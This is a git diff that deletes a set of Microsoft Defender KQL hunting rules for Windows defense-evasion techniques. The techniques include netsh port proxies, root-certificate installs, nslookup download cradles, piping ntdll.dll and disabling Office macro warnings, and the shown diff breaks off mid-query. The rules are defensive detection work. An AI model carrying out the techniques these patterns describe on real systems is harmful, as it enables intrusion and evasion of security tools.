diff --git a/Defense Evasion/New_PortProxy_Registry_Entry_Added.kql b/Defense Evasion/New_PortProxy_Registry_Entry_Added.kql
deleted file mode 100644
index edd848c1..00000000
--- a/Defense Evasion/New_PortProxy_Registry_Entry_Added.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Andreas Hunkeler (@Karneades)
-// Date: 2021/06/22
-// Level: medium
-// Description: Detects the modification of the PortProxy registry key which is used for port forwarding.
-// Tags: attack.lateral_movement, attack.defense_evasion, attack.command_and_control, attack.t1090
-DeviceRegistryEvents
-| where RegistryKey contains "\\Services\\PortProxy\\v4tov4\\tcp"
\ No newline at end of file
diff --git a/Defense Evasion/New_Port_Forwarding_Rule_Added_Via_Netsh.EXE.kql b/Defense Evasion/New_Port_Forwarding_Rule_Added_Via_Netsh.EXE.kql
deleted file mode 100644
index bde86a78..00000000
--- a/Defense Evasion/New_Port_Forwarding_Rule_Added_Via_Netsh.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), omkar72, oscd.community, Swachchhanda Shrawan Poudel
-// Date: 2019/01/29
-// Level: medium
-// Description: Detects the execution of netsh commands that configure a new port forwarding (PortProxy) rule
-// Tags: attack.lateral_movement, attack.defense_evasion, attack.command_and_control, attack.t1090
-DeviceProcessEvents
-| where (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe") and ((ProcessCommandLine contains "interface" and ProcessCommandLine contains "portproxy" and ProcessCommandLine contains "add" and ProcessCommandLine contains "v4tov4") or (ProcessCommandLine contains "i " and ProcessCommandLine contains "p " and ProcessCommandLine contains "a " and ProcessCommandLine contains "v ") or (ProcessCommandLine contains "connectp" and ProcessCommandLine contains "listena" and ProcessCommandLine contains "c="))
\ No newline at end of file
diff --git a/Defense Evasion/New_Process_Created_Via_Taskmgr.EXE.kql b/Defense Evasion/New_Process_Created_Via_Taskmgr.EXE.kql
deleted file mode 100644
index c6f79160..00000000
--- a/Defense Evasion/New_Process_Created_Via_Taskmgr.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2018/03/13
-// Level: low
-// Description: Detects the creation of a process via the Windows task manager. This might be an attempt to bypass UAC
-// Tags: attack.defense_evasion, attack.t1036
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\taskmgr.exe" and (not((FolderPath endswith ":\\Windows\\System32\\mmc.exe" or FolderPath endswith ":\\Windows\\System32\\resmon.exe" or FolderPath endswith ":\\Windows\\System32\\Taskmgr.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/New_Root_Certificate_Installed_Via_CertMgr.EXE.kql b/Defense Evasion/New_Root_Certificate_Installed_Via_CertMgr.EXE.kql
deleted file mode 100644
index 4cc604ab..00000000
--- a/Defense Evasion/New_Root_Certificate_Installed_Via_CertMgr.EXE.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: oscd.community, @redcanary, Zach Stanford @svch0st
-// Date: 2023/03/05
-// Level: medium
-// Description: Detects execution of "certmgr" with the "add" flag in order to install a new certificate on the system.
-Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.
-
-// Tags: attack.defense_evasion, attack.t1553.004
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/add" and ProcessCommandLine contains "root") and (FolderPath endswith "\\CertMgr.exe" or ProcessVersionInfoOriginalFileName =~ "CERTMGT.EXE")
\ No newline at end of file
diff --git a/Defense Evasion/New_Root_Certificate_Installed_Via_Certutil.EXE.kql b/Defense Evasion/New_Root_Certificate_Installed_Via_Certutil.EXE.kql
deleted file mode 100644
index 39fd1adb..00000000
--- a/Defense Evasion/New_Root_Certificate_Installed_Via_Certutil.EXE.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: oscd.community, @redcanary, Zach Stanford @svch0st
-// Date: 2023/03/05
-// Level: medium
-// Description: Detects execution of "certutil" with the "addstore" flag in order to install a new certificate on the system.
-Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.
-
-// Tags: attack.defense_evasion, attack.t1553.004
-DeviceProcessEvents
-| where (ProcessCommandLine contains "-addstore" or ProcessCommandLine contains "/addstore") and ProcessCommandLine contains "root" and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Node_Process_Executions.kql b/Defense Evasion/Node_Process_Executions.kql
deleted file mode 100644
index 317037be..00000000
--- a/Defense Evasion/Node_Process_Executions.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Max Altgelt (Nextron Systems)
-// Date: 2022/04/06
-// Level: medium
-// Description: Detects the execution of other scripts using the Node executable packaged with Adobe Creative Cloud
-// Tags: attack.defense_evasion, attack.t1127, attack.t1059.007
-DeviceProcessEvents
-| where FolderPath endswith "\\Adobe Creative Cloud Experience\\libs\\node.exe" and (not(ProcessCommandLine contains "Adobe Creative Cloud Experience\\js"))
\ No newline at end of file
diff --git a/Defense Evasion/Non-privileged_Usage_of_Reg_or_Powershell.kql b/Defense Evasion/Non-privileged_Usage_of_Reg_or_Powershell.kql
deleted file mode 100644
index 80c08589..00000000
--- a/Defense Evasion/Non-privileged_Usage_of_Reg_or_Powershell.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Teymur Kheirkhabarov (idea), Ryan Plas (rule), oscd.community
-// Date: 2020/10/05
-// Level: high
-// Description: Search for usage of reg or Powershell by non-privileged users to modify service configuration in registry
-// Tags: attack.defense_evasion, attack.t1112
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "reg " and ProcessCommandLine contains "add") or (ProcessCommandLine contains "powershell" or ProcessCommandLine contains "set-itemproperty" or ProcessCommandLine contains " sp " or ProcessCommandLine contains "new-itemproperty")) and ((ProcessCommandLine contains "ImagePath" or ProcessCommandLine contains "FailureCommand" or ProcessCommandLine contains "ServiceDLL") and (ProcessCommandLine contains "ControlSet" and ProcessCommandLine contains "Services") and ProcessIntegrityLevel =~ "Medium")
\ No newline at end of file
diff --git a/Defense Evasion/Nslookup_PowerShell_Download_Cradle_-_ProcessCreation.kql b/Defense Evasion/Nslookup_PowerShell_Download_Cradle_-_ProcessCreation.kql
deleted file mode 100644
index b0dfafe0..00000000
--- a/Defense Evasion/Nslookup_PowerShell_Download_Cradle_-_ProcessCreation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/09/05
-// Level: medium
-// Description: Detects suspicious powershell download cradle using nslookup. This cradle uses nslookup to extract payloads from DNS records
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " -q=txt " or ProcessCommandLine contains " -querytype=txt ") and (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe")) and (FolderPath contains "\\nslookup.exe" or ProcessVersionInfoOriginalFileName =~ "\\nslookup.exe")
\ No newline at end of file
diff --git a/Defense Evasion/NtdllPipe_Like_Activity_Execution.kql b/Defense Evasion/NtdllPipe_Like_Activity_Execution.kql
deleted file mode 100644
index 97bb7aff..00000000
--- a/Defense Evasion/NtdllPipe_Like_Activity_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/03/05
-// Level: high
-// Description: Detects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection. As seen being used in the POC NtdllPipe
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where ProcessCommandLine contains "type %windir%\\system32\\ntdll.dll" or ProcessCommandLine contains "type %systemroot%\\system32\\ntdll.dll" or ProcessCommandLine contains "type c:\\windows\\system32\\ntdll.dll" or ProcessCommandLine contains "\\ntdll.dll > \\\\.\\pipe\\"
\ No newline at end of file
diff --git a/Defense Evasion/OceanLotus_Registry_Activity.kql b/Defense Evasion/OceanLotus_Registry_Activity.kql
deleted file mode 100644
index af20c10a..00000000
--- a/Defense Evasion/OceanLotus_Registry_Activity.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: megan201296, Jonhnathan Ribeiro
-// Date: 2019/04/14
-// Level: critical
-// Description: Detects registry keys created in OceanLotus (also known as APT32) attacks
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where RegistryKey contains "\\SOFTWARE\\Classes\\CLSID\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\Model" or (RegistryKey contains "Classes\\AppXc52346ec40fb4061ad96be0e6cb7d16a" or RegistryKey contains "Classes\\AppX3bbba44c6cae4d9695755183472171e2" or RegistryKey contains "Classes\\CLSID\\{E3517E26-8E93-458D-A6DF-8030BC80528B}" or RegistryKey contains "Classes\\CLSID\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\Model") or (RegistryKey contains "\\SOFTWARE\\App" and ((RegistryKey contains "AppXbf13d4ea2945444d8b13e2121cb6b663" or RegistryKey contains "AppX70162486c7554f7f80f481985d67586d" or RegistryKey contains "AppX37cc7fdccd644b4f85f4b22d5a3f105a") and (RegistryKey endswith "Application" or RegistryKey endswith "DefaultIcon")))
\ No newline at end of file
diff --git a/Defense Evasion/Odbcconf.EXE_Suspicious_DLL_Location.kql b/Defense Evasion/Odbcconf.EXE_Suspicious_DLL_Location.kql
deleted file mode 100644
index 6707a71e..00000000
--- a/Defense Evasion/Odbcconf.EXE_Suspicious_DLL_Location.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/22
-// Level: high
-// Description: Detects execution of "odbcconf" where the path of the DLL being registered is located in a potentially suspicious location.
-// Tags: attack.defense_evasion, attack.t1218.008
-DeviceProcessEvents
-| where (ProcessCommandLine contains ":\\PerfLogs\\" or ProcessCommandLine contains ":\\ProgramData\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\Registration\\CRMLog" or ProcessCommandLine contains ":\\Windows\\System32\\com\\dmp\\" or ProcessCommandLine contains ":\\Windows\\System32\\FxsTmp\\" or ProcessCommandLine contains ":\\Windows\\System32\\Microsoft\\Crypto\\RSA\\MachineKeys\\" or ProcessCommandLine contains ":\\Windows\\System32\\spool\\drivers\\color\\" or ProcessCommandLine contains ":\\Windows\\System32\\spool\\PRINTERS\\" or ProcessCommandLine contains ":\\Windows\\System32\\spool\\SERVERS\\" or ProcessCommandLine contains ":\\Windows\\System32\\Tasks_Migrated\\" or ProcessCommandLine contains ":\\Windows\\System32\\Tasks\\Microsoft\\Windows\\SyncCenter\\" or ProcessCommandLine contains ":\\Windows\\SysWOW64\\com\\dmp\\" or ProcessCommandLine contains ":\\Windows\\SysWOW64\\FxsTmp\\" or ProcessCommandLine contains ":\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\PLA\\System\\" or ProcessCommandLine contains ":\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\SyncCenter\\" or ProcessCommandLine contains ":\\Windows\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains ":\\Windows\\Tracing\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Roaming\\") and (FolderPath endswith "\\odbcconf.exe" or ProcessVersionInfoOriginalFileName =~ "odbcconf.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Office_Macros_Warning_Disabled.kql b/Defense Evasion/Office_Macros_Warning_Disabled.kql
deleted file mode 100644
index e452118e..00000000
--- a/Defense Evasion/Office_Macros_Warning_Disabled.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Trent Liffick (@tliffick), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2020/05/22
-// Level: high
-// Description: Detects registry changes to Microsoft Office "VBAWarning" to a value of "1" which enables the execution of all macros, whether signed or unsigned.
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\Security\\VBAWarnings"
\ No newline at end of file
diff --git a/Defense Evasion/OilRig_APT_Registry_Persistence.kql b/Defense Evasion/OilRig_APT_Registry_Persistence.kql
deleted file mode 100644
index 83beccff..00000000
--- a/Defense Evasion/OilRig_APT_Registry_Persistence.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community
-// Date: 2018/03/23
-// Level: critical
-// Description: Detects OilRig registry persistence as reported by Nyotron in their March 2018 report
-// Tags: attack.persistence, attack.g0049, attack.t1053.005, attack.s0111, attack.t1543.003, attack.defense_evasion, attack.t1112, attack.command_and_control, attack.t1071.004
-DeviceRegistryEvents
-| where RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\UMe" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\UT"
\ No newline at end of file
diff --git a/Defense Evasion/OneNote_Attachment_File_Dropped_In_Suspicious_Location.kql b/Defense Evasion/OneNote_Attachment_File_Dropped_In_Suspicious_Location.kql
deleted file mode 100644
index 3ec39e0a..00000000
--- a/Defense Evasion/OneNote_Attachment_File_Dropped_In_Suspicious_Location.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/01/22
-// Level: medium
-// Description: Detects creation of files with the ".one"/".onepkg" extension in suspicious or uncommon locations. This could be a sign of attackers abusing OneNote attachments
-// Tags: attack.defense_evasion
-DeviceFileEvents
-| where ((FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\Windows\\Temp\\" or FolderPath contains ":\\Temp\\") and (FolderPath endswith ".one" or FolderPath endswith ".onepkg")) and (not((InitiatingProcessFolderPath contains ":\\Program Files\\Microsoft Office\\" and InitiatingProcessFolderPath endswith "\\ONENOTE.EXE")))
\ No newline at end of file
diff --git a/Defense Evasion/OpenWith.exe_Executes_Specified_Binary.kql b/Defense Evasion/OpenWith.exe_Executes_Specified_Binary.kql
deleted file mode 100644
index 5a82e930..00000000
--- a/Defense Evasion/OpenWith.exe_Executes_Specified_Binary.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Beyu Denis, oscd.community (rule), @harr0ey (idea)
-// Date: 2019/10/12
-// Level: high
-// Description: The OpenWith.exe executes other binary
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ProcessCommandLine contains "/c" and FolderPath endswith "\\OpenWith.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Outbound_Network_Connection_Initiated_By_Cmstp.EXE.kql b/Defense Evasion/Outbound_Network_Connection_Initiated_By_Cmstp.EXE.kql
deleted file mode 100644
index 4dd5005e..00000000
--- a/Defense Evasion/Outbound_Network_Connection_Initiated_By_Cmstp.EXE.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/30
-// Level: high
-// Description: Detects a network connection initiated by Cmstp.EXE
-Its uncommon for "cmstp.exe" to initiate an outbound network connection. Investigate the source of such requests to determine if they are malicious.
-
-// Tags: attack.defense_evasion, attack.t1218.003
-DeviceNetworkEvents
-| where InitiatingProcessFolderPath endswith "\\cmstp.exe" and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7"))))
\ No newline at end of file
diff --git a/Defense Evasion/Outbound_Network_Connection_To_Public_IP_Via_Winlogon.kql b/Defense Evasion/Outbound_Network_Connection_To_Public_IP_Via_Winlogon.kql
deleted file mode 100644
index 88e21026..00000000
--- a/Defense Evasion/Outbound_Network_Connection_To_Public_IP_Via_Winlogon.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io
-// Date: 2023/04/28
-// Level: medium
-// Description: Detects a "winlogon.exe" process that initiate network communications with public IP addresses
-// Tags: attack.defense_evasion, attack.execution, attack.command_and_control, attack.t1218.011
-DeviceNetworkEvents
-| where InitiatingProcessFolderPath endswith "\\winlogon.exe" and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7"))))
\ No newline at end of file
diff --git a/Defense Evasion/Outlook_EnableUnsafeClientMailRules_Setting_Enabled_-_Registry.kql b/Defense Evasion/Outlook_EnableUnsafeClientMailRules_Setting_Enabled_-_Registry.kql
deleted file mode 100644
index 925798e2..00000000
--- a/Defense Evasion/Outlook_EnableUnsafeClientMailRules_Setting_Enabled_-_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/08
-// Level: high
-// Description: Detects an attacker trying to enable the outlook security setting "EnableUnsafeClientMailRules" which allows outlook to run applications or execute macros
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\Outlook\\Security\\EnableUnsafeClientMailRules"
\ No newline at end of file
diff --git a/Defense Evasion/PSScriptPolicyTest_Creation_By_Uncommon_Process.kql b/Defense Evasion/PSScriptPolicyTest_Creation_By_Uncommon_Process.kql
deleted file mode 100644
index 744c3788..00000000
--- a/Defense Evasion/PSScriptPolicyTest_Creation_By_Uncommon_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/06/01
-// Level: medium
-// Description: Detects the creation of the "PSScriptPolicyTest" PowerShell script by an uncommon process. This file is usually generated by Microsoft Powershell to test against Applocker.
-// Tags: attack.defense_evasion
-DeviceFileEvents
-| where FolderPath contains "__PSScriptPolicyTest_" and (not((InitiatingProcessFolderPath endswith ":\\Program Files\\PowerShell\\7-preview\\pwsh.exe" or InitiatingProcessFolderPath endswith ":\\Program Files\\PowerShell\\7\\pwsh.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\dsac.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\sdiagnhost.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\ServerManager.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\wsmprovhost.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\SysWOW64\\sdiagnhost.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/PUA_-_AdvancedRun_Execution.kql b/Defense Evasion/PUA_-_AdvancedRun_Execution.kql
deleted file mode 100644
index 4e6050fc..00000000
--- a/Defense Evasion/PUA_-_AdvancedRun_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/01/20
-// Level: medium
-// Description: Detects the execution of AdvancedRun utility
-// Tags: attack.execution, attack.defense_evasion, attack.privilege_escalation, attack.t1564.003, attack.t1134.002, attack.t1059.003
-DeviceProcessEvents
-| where ProcessVersionInfoOriginalFileName =~ "AdvancedRun.exe" or (ProcessCommandLine contains " /EXEFilename " and ProcessCommandLine contains " /Run") or (ProcessCommandLine contains " /WindowState 0" and ProcessCommandLine contains " /RunAs " and ProcessCommandLine contains " /CommandLine ")
\ No newline at end of file
diff --git a/Defense Evasion/PUA_-_AdvancedRun_Suspicious_Execution.kql b/Defense Evasion/PUA_-_AdvancedRun_Suspicious_Execution.kql
deleted file mode 100644
index c00dd12f..00000000
--- a/Defense Evasion/PUA_-_AdvancedRun_Suspicious_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/01/20
-// Level: high
-// Description: Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1134.002
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/EXEFilename" or ProcessCommandLine contains "/CommandLine") and ((ProcessCommandLine contains " /RunAs 8 " or ProcessCommandLine contains " /RunAs 4 " or ProcessCommandLine contains " /RunAs 10 " or ProcessCommandLine contains " /RunAs 11 ") or (ProcessCommandLine endswith "/RunAs 8" or ProcessCommandLine endswith "/RunAs 4" or ProcessCommandLine endswith "/RunAs 10" or ProcessCommandLine endswith "/RunAs 11"))
\ No newline at end of file
diff --git a/Defense Evasion/PUA_-_CleanWipe_Execution.kql b/Defense Evasion/PUA_-_CleanWipe_Execution.kql
deleted file mode 100644
index 3da29794..00000000
--- a/Defense Evasion/PUA_-_CleanWipe_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021/12/18
-// Level: high
-// Description: Detects the use of CleanWipe a tool usually used to delete Symantec antivirus.
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where FolderPath endswith "\\SepRemovalToolNative_x64.exe" or (ProcessCommandLine contains "--uninstall" and FolderPath endswith "\\CATClean.exe") or (ProcessCommandLine contains "-r" and FolderPath endswith "\\NetInstaller.exe") or ((ProcessCommandLine contains "/uninstall" and ProcessCommandLine contains "/enterprise") and FolderPath endswith "\\WFPUnins.exe")
\ No newline at end of file
diff --git a/Defense Evasion/PUA_-_DefenderCheck_Execution.kql b/Defense Evasion/PUA_-_DefenderCheck_Execution.kql
deleted file mode 100644
index d05b1bb7..00000000
--- a/Defense Evasion/PUA_-_DefenderCheck_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/08/30
-// Level: high
-// Description: Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and thus used for AV evasion.
-// Tags: attack.defense_evasion, attack.t1027.005
-DeviceProcessEvents
-| where FolderPath endswith "\\DefenderCheck.exe" or ProcessVersionInfoFileDescription =~ "DefenderCheck"
\ No newline at end of file
diff --git a/Defense Evasion/PUA_-_Potential_PE_Metadata_Tamper_Using_Rcedit.kql b/Defense Evasion/PUA_-_Potential_PE_Metadata_Tamper_Using_Rcedit.kql
deleted file mode 100644
index 5d350006..00000000
--- a/Defense Evasion/PUA_-_Potential_PE_Metadata_Tamper_Using_Rcedit.kql
+++ /dev/null
@@ -1,7 +0,0 @@ -// Author: Micah Babinski -// Date: 2022/12/11 -// Level: medium -// Description: Detects the use of rcedit to potentially alter executable PE metadata properties, which could conceal efforts to rename system utilities for defense evasion. -// Tags: attack.defense_evasion, attack.t1036.003, attack.t1036, attack.t1027.005, attack.t1027 -DeviceProcessEvents -| where (ProcessCommandLine contains "OriginalFileName" or ProcessCommandLine contains "CompanyName" or ProcessCommandLine contains "FileDescription" or ProcessCommandLine contains "ProductName" or ProcessCommandLine contains "ProductVersion" or ProcessCommandLine contains "LegalCopyright") and ProcessCommandLine contains "--set-" and ((FolderPath endswith "\\rcedit-x64.exe" or FolderPath endswith "\\rcedit-x86.exe") or ProcessVersionInfoFileDescription =~ "Edit resources of exe" or ProcessVersionInfoProductName =~ "rcedit") \ No newline at end of file diff --git a/Defense Evasion/Parent_in_Public_Folder_Suspicious_Process.kql b/Defense Evasion/Parent_in_Public_Folder_Suspicious_Process.kql deleted file mode 100644 index 65b83f51..00000000 --- a/Defense Evasion/Parent_in_Public_Folder_Suspicious_Process.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/02/25 -// Level: high -// Description: This rule detects suspicious processes with parent images located in the C:\Users\Public folder -// Tags: attack.defense_evasion, attack.execution, attack.t1564, attack.t1059 -DeviceProcessEvents -| where (ProcessCommandLine contains "powershell" or ProcessCommandLine contains "cmd.exe /c " or ProcessCommandLine contains "cmd.exe /r " or ProcessCommandLine contains "cmd.exe /k " or ProcessCommandLine contains "cmd /c " or ProcessCommandLine contains "cmd /r " or ProcessCommandLine contains "cmd /k " or ProcessCommandLine contains "wscript.exe" or ProcessCommandLine contains "cscript.exe" or ProcessCommandLine contains "bitsadmin" or ProcessCommandLine contains "certutil" or ProcessCommandLine contains "mshta.exe") and InitiatingProcessFolderPath startswith "C:\\Users\\Public\\" \ No newline at end of file diff --git a/Defense Evasion/Password_Provided_In_Command_Line_Of_Net.EXE.kql b/Defense Evasion/Password_Provided_In_Command_Line_Of_Net.EXE.kql deleted file mode 100644 index 5662813f..00000000 --- a/Defense Evasion/Password_Provided_In_Command_Line_Of_Net.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Tim Shelton (HAWK.IO) -// Date: 2021/12/09 -// Level: medium -// Description: Detects a when net.exe is called with a password in the command line -// Tags: attack.defense_evasion, attack.initial_access, attack.persistence, attack.privilege_escalation, attack.lateral_movement, attack.t1021.002, attack.t1078 -DeviceProcessEvents -| where ((ProcessCommandLine contains " use " and (ProcessCommandLine contains ":" and ProcessCommandLine contains "\\") and (ProcessCommandLine contains "/USER:" and ProcessCommandLine contains " ")) and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))) and (not(ProcessCommandLine endswith " ")) \ No newline at end of file 
diff --git a/Defense Evasion/Persistence_Via_New_SIP_Provider.kql b/Defense Evasion/Persistence_Via_New_SIP_Provider.kql deleted file mode 100644 index 08cf0096..00000000 --- a/Defense Evasion/Persistence_Via_New_SIP_Provider.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/07/21 -// Level: medium -// Description: Detects when an attacker register a new SIP provider for persistence and defense evasion -// Tags: attack.persistence, attack.defense_evasion, attack.t1553.003 -DeviceRegistryEvents -| where ((RegistryKey contains "\\Dll" or RegistryKey contains "\\$DLL") and (RegistryKey contains "\\SOFTWARE\\Microsoft\\Cryptography\\Providers" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType" or RegistryKey contains "\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\Providers" or RegistryKey contains "\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\\EncodingType")) and (not(((RegistryValueData in~ ("WINTRUST.DLL", "mso.dll")) or (RegistryValueData =~ "C:\\Windows\\System32\\PsfSip.dll" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\poqexec.exe" and RegistryKey contains "\\CryptSIPDll")))) \ No newline at end of file diff --git a/Defense Evasion/Ping_Hex_IP.kql b/Defense Evasion/Ping_Hex_IP.kql deleted file mode 100644 index 5d98cb81..00000000 --- a/Defense Evasion/Ping_Hex_IP.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2018/03/23 -// Level: high -// Description: Detects a ping command that uses a hex encoded IP address -// Tags: attack.defense_evasion, attack.t1140, attack.t1027 -DeviceProcessEvents -| where ProcessCommandLine contains "0x" and FolderPath endswith "\\ping.exe" \ No newline at end of file diff --git a/Defense Evasion/Possible_Privilege_Escalation_via_Weak_Service_Permissions.kql b/Defense Evasion/Possible_Privilege_Escalation_via_Weak_Service_Permissions.kql deleted file mode 100644 index 8867fa02..00000000 
--- a/Defense Evasion/Possible_Privilege_Escalation_via_Weak_Service_Permissions.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Teymur Kheirkhabarov -// Date: 2019/10/26 -// Level: high -// Description: Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand -// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1574.011 -DeviceProcessEvents -| where (FolderPath endswith "\\sc.exe" and ProcessIntegrityLevel =~ "Medium") and ((ProcessCommandLine contains "config" and ProcessCommandLine contains "binPath") or (ProcessCommandLine contains "failure" and ProcessCommandLine contains "command")) \ No newline at end of file diff --git a/Defense Evasion/Potential_7za.DLL_Sideloading.kql b/Defense Evasion/Potential_7za.DLL_Sideloading.kql deleted file mode 100644 index f1cc961b..00000000 --- a/Defense Evasion/Potential_7za.DLL_Sideloading.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior -// Date: 2023/06/09 -// Level: low -// Description: Detects potential DLL sideloading of "7za.dll" -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\7za.dll" and (not(((FolderPath startswith "C:\\Program Files (x86)\\" or FolderPath startswith "C:\\Program 